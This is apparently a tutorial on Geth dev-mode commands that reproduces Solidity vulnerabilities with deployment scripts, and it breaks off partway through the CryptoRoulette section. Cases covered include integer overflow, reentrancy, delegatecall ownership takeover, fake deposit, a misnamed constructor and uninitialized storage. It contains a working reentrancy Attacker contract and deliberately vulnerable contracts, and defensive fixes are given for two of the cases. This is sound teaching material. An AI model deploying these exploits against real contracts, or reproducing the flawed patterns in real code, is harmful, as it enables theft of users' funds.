Ethereum client Geth: basic operations and reproduction of 10 single-chain attacks and their defenses


Contents

  Common web3 commands: add a new account; query an account balance; define a variable; unlock an account; transfer; set the account used for function calls; call functions (sendTransaction-type and call-type); account addresses
  Starting geth
  Reproducing several attacks: integer overflow (contract deployment methods 1 and 2); reentrancy attack (the deployment account); delegatecall vulnerability (constructor parameters at deployment); fake deposit vulnerability; Rubixi vulnerability; CryptoRoulette attack; King of the Ether Throne attack (DoS) (passing msg.value at deployment); call-after-destruct attack; rollback attack; shadow variable attack

Common web3 commands

Add a new account

personal.newAccount()

Query an account balance

(Displayed in ether; contract accounts can be queried the same way): web3.fromWei(eth.getBalance("0xfe44108f962ae9afa23699b5b7f1fa817e5b5012"), "ether")

Define a variable

var acc0=eth.accounts[0]

Unlock an account

(In dev mode, every account other than the developer account accounts[0] must be unlocked once before each use): personal.unlockAccount(eth.accounts[1])

Transfer

(acc0 and acc1 are variables defined beforehand; if they are not defined, an address can be given directly, enclosed in straight double quotes): eth.sendTransaction({from: acc0, to: acc1, value: web3.toWei('100', 'ether')})

Set the account used for the current function call

web3.eth.defaultAccount = web3.eth.accounts[0]

Call functions

Calling sendTransaction-type functions

(If the call does not need to send msg.value, simply drop the value option):

contractName.functionName.sendTransaction(args, {from: "0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb", value: web3.toWei('10', 'ether')})

(These calls cost gas, which is paid by the from: account.)

Calling call-type functions

contractName.functionName.call(args)

Accounts persist in the keystore directory; accounts[0] is the developer account, whose ether balance is effectively unlimited.

Account addresses

// The following are my own account lists, kept here for copy and paste

attack1 data directory:

eth.accounts
["0x2378f0b099a2c18ff2157aa9f96c5617b0241168", "0x910d3a7564d50311e4cdbd11bc8d9068aa9ec2f9", "0x5f3d8493dfce07d413bf56e3fb295116ac24cb88", "0x044a672165513e4a19b781acb95563d8377e7206"]

attack2 data directory:

eth.accounts
["0xfe44108f962ae9afa23699b5b7f1fa817e5b5012", "0xf1837bfdfcc5be3a63e5b899cd54b69950009b07"]

attack3 data directory:

eth.accounts
["0xb14c4c98d7adf099f940fea652955c3c9d3de021", "0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb"]

Starting geth

Add the environment variable to the end of /etc/profile (the path is build/bin under wherever go-ethereum was installed; mine is under /home):

export PATH=$PATH:/home/go-ethereum/build/bin

Start geth in developer mode (dev mode: no genesis.json is needed, a single command starts it, and blocks are mined instantly whenever required, which is convenient for experiments; --datadir is followed by the data directory, which you should create yourself, and > is followed by the log file):

geth --datadir ./crosschain_datadir --dev console 2>output.log

You can open another terminal and run tail -f output.log to watch the log without affecting the experiment.

Reproducing several attacks

Integer overflow

pragma solidity ^0.4.22;
contract POC{
    // Each function deliberately wraps around: uint256 arithmetic is unchecked in 0.4.x.
    function add_overflow() returns (uint256 _overflow){
        uint256 max = 2**256-1;
        return max+1;          // wraps to 0
    }
    function sub_underflow() returns (uint256 _underflow){
        uint256 min=0;
        return min-1;          // wraps to 2**256-1
    }
    function mul_overflow() returns (uint256 _overflow){
        uint256 mul= 2**255;
        return mul*2;          // wraps to 0
    }
}

Contract deployment methods

Deployment method 1

(Method 1 is recommended; method 2 is more cumbersome and has some problems):

Paste the WEB3DEPLOY output from Remix into the geth console and press Enter.

Things to note:

Delete new, make the C lowercase (Contract becomes contract), change deploy to new, and delete the content in the fourth red box of the Remix output.

After these edits it looks like this:

var pocContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"_underflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '0x608060405234801561001057600080fd5b5061017a806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100ee565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761011e565b6040518082815260200191505060405180910390f35b600080600090506001810391505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff90506001810191505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905060028102915050905600a165627a7a723058200122e17839720f0ff44791ef902738f9cfb738a12e01cfe7c41ee0591c2fa9db0029', 
     
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

poc is the contract instance name; the contract's public functions can be called directly with poc.function.call() and poc.function.sendTransaction().

Deployment method 2

Get the ABI and bytecode from Remix. The copied ABI must first be converted to a JSON string, which can be done with http://www.bejson.com/jsonviewernew/

abi=[{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"_underflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]

For the bytecode, take only the object field, prefix it with 0x and enclose it in double quotes

e.g. bytecode="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"

contract = eth.contract(abi);
eth.estimateGas({data: bytecode}) // estimate the gas cost
initializer = {from: web3.eth.accounts[0], data: bytecode, gas: 140000}; // set gas somewhat higher than the estimate
token = contract.new(initializer) // token is the contract instance; the contract's functions can be called on it directly
web3.eth.defaultAccount = web3.eth.accounts[0] // initial setup, not needed in dev mode

mycontract = contract.at(token.address) // once the contract is on chain, token can be used for calls directly, but after restarting geth the instance must be re-created with this statement

mycontract.function() // call

Defense:

pragma solidity ^0.4.22;
contract POC{

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522
        if (a == 0) {
            return 0;
        }
 
        uint256 c = a * b;
        require(c / a == b);
 
        return c;
    }
 
    /**
     * @dev Integer division of two unsigned integers truncating the quotient, reverts on division by zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
 
        return c;
    }
 
    /**
     * @dev Subtracts two unsigned integers, reverts on overflow (i.e. if subtrahend is greater than minuend).
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a);
        uint256 c = a - b;
 
        return c;
    }
 
    /**
     * @dev Adds two unsigned integers, reverts on overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a);
 
        return c;
    }
 
    /**
     * @dev Divides two unsigned integers and returns the remainder (unsigned integer modulo),
     * reverts when dividing by zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0);
        return a % b;
    }
    uint256 a;

    function add_overflow() returns (uint256 a){
        uint256 max = 2**256-1;
        return add(max,1);
    }
     function sub_underflow() returns (uint256 b){
        uint256 min=0;
        return sub(min,1);
    }
     function mul_overflow() returns (uint256 c){
        uint256 mulamount= 2**255;
        return mul(mulamount,2);
    }
}
var pocContract =web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"b","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"a","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"c","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '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', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
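As an added example (not part of the original post), the following JavaScript models the three POC cases with BigInt: the `unchecked` object reproduces the EVM wrap-around that the POC contract relies on, and the `checked` object reproduces the SafeMath-style require() checks of the defended contract above. The names `wrap`, `requireThat`, `runPoc` and the `Revert` class are chosen here.

```javascript
// Added example, not from the original post: uint256 arithmetic modelled with BigInt.
// "unchecked" reproduces the EVM's wrap-around that the POC contract relies on;
// "checked" reproduces the SafeMath-style require() checks of the defended contract.
const MOD = 1n << 256n;
const UINT256_MAX = MOD - 1n;

// Reduce a BigInt to the uint256 range, exactly as the EVM stores a result.
function wrap(x) {
  return ((x % MOD) + MOD) % MOD;
}

// Stand-in for Solidity's revert: thrown instead of undoing state.
class Revert extends Error {}
function requireThat(cond, reason) {
  if (!cond) throw new Revert(reason);
}

// Plain 0.4.x semantics: no checks, results silently wrap.
const unchecked = {
  add: (a, b) => wrap(a + b),
  sub: (a, b) => wrap(a - b),
  mul: (a, b) => wrap(a * b),
};

// SafeMath-style checks, mirroring the defended contract line by line.
const checked = {
  add(a, b) {
    const c = wrap(a + b);
    requireThat(c >= a, "add overflow");      // require(c >= a)
    return c;
  },
  sub(a, b) {
    requireThat(b <= a, "sub underflow");     // require(b <= a)
    return a - b;
  },
  mul(a, b) {
    if (a === 0n) return 0n;
    const c = wrap(a * b);
    requireThat(c / a === b, "mul overflow"); // require(c / a == b)
    return c;
  },
  div(a, b) {
    requireThat(b > 0n, "division by zero");  // require(b > 0)
    return a / b;
  },
  mod(a, b) {
    requireThat(b !== 0n, "modulo by zero");  // require(b != 0)
    return a % b;
  },
};

// The three POC cases from the page, run against either arithmetic.
// A Revert is reported as the string "revert" so the two can be compared side by side.
function runPoc(arith) {
  const cases = {
    add_overflow: () => arith.add(UINT256_MAX, 1n),  // max + 1
    sub_underflow: () => arith.sub(0n, 1n),          // 0 - 1
    mul_overflow: () => arith.mul(1n << 255n, 2n),   // 2**255 * 2
  };
  const results = {};
  for (const [name, fn] of Object.entries(cases)) {
    try {
      results[name] = fn();
    } catch (e) {
      if (!(e instanceof Revert)) throw e;
      results[name] = "revert";
    }
  }
  return results;
}

console.log("unchecked:", runPoc(unchecked));
console.log("checked:  ", runPoc(checked));
```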
Reentrancy attack

pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            // External call before the state update: the receiver's fallback can
            // call withDraw() again while userBalannce[msg.sender] is still non-zero.
            msg.sender.call.value(amount)();
            userBalannce[msg.sender] = 0;
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

The deployment account when deploying a contract

This is the account given at from: web3.eth.accounts[0]; if it is an account other than accounts[0], it must be unlocked once before deploying.

var victimContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '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', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 

Contract mined! address: 0x58c4688b17b24831103a25344f01812f62e711bd transactionHash: 0x5ee74325304fc8c7688a8504ba774524d382bbbec15033a3677332b0cd0e0701

The second contract, Attacker:

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:10000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xc852dadfa72c66c479d3b45672bb7cd50bbad658 transactionHash: 0xb348fd2e63bebfac65e7494cda20ebaf28fe4dc445898694dd7b3e187251a1f0

Defense:

pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            // Checks-effects-interactions: zero the balance before the external call,
            // so a re-entrant withDraw() finds amount == 0 and does nothing.
            userBalannce[msg.sender] = 0;
            msg.sender.call.value(amount)();
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

var victimContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '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', 
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:25000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xafe0d2de59b350c1ae67b3238f9697c6be32275e transactionHash: 0x3fa4e24bfc1510ae78d029ebf628524ceb313688c9262bb7c69b69480001e367

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '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', 
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
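As an added example (not part of the original post), the following JavaScript is a plain model of the Victim and Attacker contracts above, run once with the vulnerable call ordering and once with the checks-effects-interactions ordering of the defended Victim. The balances, `MAX_DEPTH` and the `simulate` scenario are constructed here and stand in for real ether and the gas limit.

```javascript
// Added example, not from the original post: a plain-JS model of the Victim/Attacker
// contracts above. Balances are whole ether; an external call moves the value and then
// runs the receiver's fallback, which is what msg.sender.call.value(amount)() does.
// MAX_DEPTH is a constructed stand-in for the gas limit that ends a real re-entry chain.
const MAX_DEPTH = 64;

class Victim {
  constructor(initialEther, fixed) {
    this.balance = initialEther;     // ether held by the contract
    this.userBalance = new Map();    // the userBalannce mapping
    this.fixed = fixed;              // true: checks-effects-interactions ordering
  }

  receiveEther(sender, value) {
    if (value <= 0) return;
    sender.balance -= value;
    this.balance += value;
    this.userBalance.set(sender, (this.userBalance.get(sender) || 0) + value);
  }

  withDraw(sender, depth) {
    const amount = this.userBalance.get(sender) || 0;
    if (amount === 0) return;
    if (this.fixed) {
      this.userBalance.set(sender, 0);   // effect first ...
      this.call(sender, amount, depth);  // ... then the interaction
    } else {
      this.call(sender, amount, depth);  // interaction first: the fallback re-enters
      this.userBalance.set(sender, 0);   // while userBalance is still non-zero
    }
  }

  // msg.sender.call.value(amount)(): returns false instead of reverting when it fails.
  call(to, amount, depth) {
    if (this.balance < amount || depth >= MAX_DEPTH) return false;
    this.balance -= amount;
    to.balance += amount;
    to.fallback(this, depth + 1);
    return true;
  }
}

class Attacker {
  constructor(initialEther) {
    this.balance = initialEther;
    this.test = 0;                    // counts fallback invocations, like the contract's test
  }
  // function() payable { test++; Victim(msg.sender).withDraw(); }
  fallback(victim, depth) {
    this.test++;
    victim.withDraw(this, depth);
  }
  sendMoney(victim) { victim.receiveEther(this, 1); }   // receiveEther.value(1 ether)()
  reentry(victim) { victim.withDraw(this, 0); }
}

// Constructed scenario: Victim holds 10 ether belonging to other users, Attacker holds 2,
// deposits 1 through sendMoney() and then calls reentry().
function simulate(fixed) {
  const victim = new Victim(10, fixed);
  const attacker = new Attacker(2);
  attacker.sendMoney(victim);
  attacker.reentry(victim);
  return {
    victimBalance: victim.balance,
    attackerBalance: attacker.balance,
    fallbackCalls: attacker.test,
  };
}

console.log("vulnerable:", simulate(false));
console.log("fixed:     ", simulate(true));
```

With the vulnerable ordering the 1 ether deposit is withdrawn eleven times until the contract is empty; with the fixed ordering the second withDraw() sees a zero balance and the contract keeps the other users' 10 ether.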
delegatecall vulnerability

pragma solidity ^0.4.10;
contract Delegate {
    address public owner;
    function Delegate(address _owner) {
        owner = _owner;
    }
    function setOwner() {
        owner = msg.sender;
    }
}
contract Delegation {
    address public owner;
    Delegate delegate;
    function Delegation(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }
    function () {
        // delegatecall runs Delegate.setOwner() in this contract's storage context,
        // so the write to slot 0 changes Delegation.owner, not Delegate.owner.
        if (delegate.delegatecall(bytes4(keccak256("setOwner()")))) {
            this;
        }
    }
}

The first contract, Delegate:

Handling constructor parameters when deploying a contract

In the first few lines of the WEB3DEPLOY output, fill in the corresponding parameter values, and between the ( and { after contract.new( (the third line below) put the list of the defined variables, separated by commas and with a trailing comma. Note that address-type variables must be enclosed in straight double quotes when defined.

var _owner = "0x2378f0b099a2c18ff2157aa9f96c5617b0241168" ;
var delegateContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"setOwner","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_owner","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegate = delegateContract.new(_owner,
{
     data: '0x6060604052341561000c57fe5b6040516020806101bc833981016040528080519060200190919050505b80600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101408061007c6000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806340caae06146100465780638da5cb5b14610058575bfe5b341561004e57fe5b6100566100aa565b005b341561006057fe5b6100686100ee565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b33600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b565b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a723058207a55306717c1e8cc5fa91b9d9796fd332c150849ad0f7500db1b515f71458cfd0029', 
          
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8 transactionHash: 0x65bb9d9488fde84f6ae526a926af64dcaf6e055f591d1dc092abfe69e701a336

The second contract, Delegation:

var _delegateAddress = "0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8" ;
var delegationContract = web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"attack","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new( _delegateAddress,
{
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 
var _delegateAddress = "0x06e1b0366ea9d22731d03e2dfffbdbcfca2796d6";
var delegationContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new(
_delegateAddress,{
     data: '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', 

     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xd1115e35e29b3c14e2a4091aa16026eeb19995ca transactionHash: 0xd12bccb652b818fcd3b68e34c3b7aa20a3a321be5aa16d9ebde0bb6f3d1123ea

Fake deposit vulnerability

pragma solidity ^0.4.22;

contract token1{
    address owner;
    uint public amount = 0;
    mapping (address => uint256) balances;
    function token1() payable {}
    function() payable {}
    function deposit1() payable {balances[msg.sender] += msg.value; }
    function deposit2() payable {balances[this] += msg.value; }
    // Fake-deposit pattern: a failed transfer returns false instead of reverting, so the
    // transaction still succeeds on chain. A receiver that only checks the transaction
    // status, rather than the return value, credits a deposit that never happened.
    function transfer(address _to, uint256 _value) public returns (bool) {
        if(_value <= balances[msg.sender] && _value > 0){
            balances[msg.sender] -= _value;
            balances[_to] += _value;
            return true;
        }
        else
            return false;
    }
}

var token1Contract = web3.eth.contract([{"constant":false,"inputs":[],"name":"deposit2","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"deposit1","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"payable":true,"type":"fallback","stateMutability":"payable"}]);
var token1 = token1Contract.new({
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xab11788d6ba4f6473557fbb9eddfa3f5bbe7effe transactionHash: 0x98831308fe0c78991154368bcf70cf203b4a45a9321b3e87d6dc9e1d04bf5b20

Rubixi vulnerability

pragma solidity ^0.4.22;

contract rubixi{
    uint private balance = 0;
    uint private collectedFees = 0;
    uint private feePercent = 10;
    uint private pyramidMultiplier = 300;
    uint private payoutOrder = 0;
    //address private creator;
    address public creator;
    
    // Meant to be the constructor, but the contract is named rubixi, so this is an
    // ordinary public function: anyone who calls it becomes creator.
    function DynamicPyramid(){
        creator = msg.sender;
    }
    function getCreator() public  returns (address){
    return creator;
  }
}
var rubixiContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"creator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"getCreator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"DynamicPyramid","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var rubixi = rubixiContract.new({
     data: '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', 
  
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xef9bd8324a06275cf4ad1721bf1e3e3bbd2ea13f transactionHash: 0xc55c83651f34e706052663a8550a22e998235c224a611c525d8f5ea16ec238e2

CryptoRoulette attack

// https://github.com/misterch0c/Solidlity-Vulnerable/blob/master/traps/CryptoRoulette.sol
// https://etherscan.io/address/0x94602b0E2512DdAd62a935763BF1277c973B2758

pragma solidity ^0.4.19;

// CryptoRoulette
//
// Guess the number secretly stored in the blockchain and win the whole contract balance!
// A new number is randomly chosen after each try.
//
// To play, call the play() method with the guessed number (1-20).  Bet price: 0.1 ether

contract CryptoRoulette { 

    uint256 private secretNumber;
    uint256 public lastPlayed;
    uint256 public betPrice = 0.1 ether;
    address public ownerAddr;

    struct Game {
        address player;
        uint256 number;
    }
    Game[] public gamesPlayed;

    function CryptoRoulette() public {
        ownerAddr = msg.sender;
        shuffle();
    }

    function shuffle() internal {
        // randomly set secretNumber with a value between 1 and 20
        //secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1;
        // For easier experimental verification, a fixed value of 1 is used here instead of reshuffling
        secretNumber = 1;
    }

    function play(uint256 number) payable public {
        require(msg.value >= betPrice && number <= 10);

        // Uninitialized storage pointer: game aliases storage slot 0, so the two
        // assignments below overwrite secretNumber and lastPlayed.
        Game game;
        game.player = msg.sender;
        game.number = number;
        gamesPlayed.push(game);

        if (number == secretNumber) {
            // win!
            msg.sender.transfer(this.balance);
        }

        shuffle();
        lastPlayed = now;
    }

    function kill() public {
        if (msg.sender == ownerAddr && now > lastPlayed + 1 days) {
            suicide(msg.sender);
        }
    }

    function() public payable { }
}
var cryptorouletteContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"uint256"}],"name":"gamesPlayed","outputs":[{"name":"player","type":"address"},{"name":"number","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"kill","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"number","type":"uint256"}],"name":"play","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"ownerAddr","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastPlayed","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"betPrice","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var cryptoroulette = cryptorouletteContract.new({
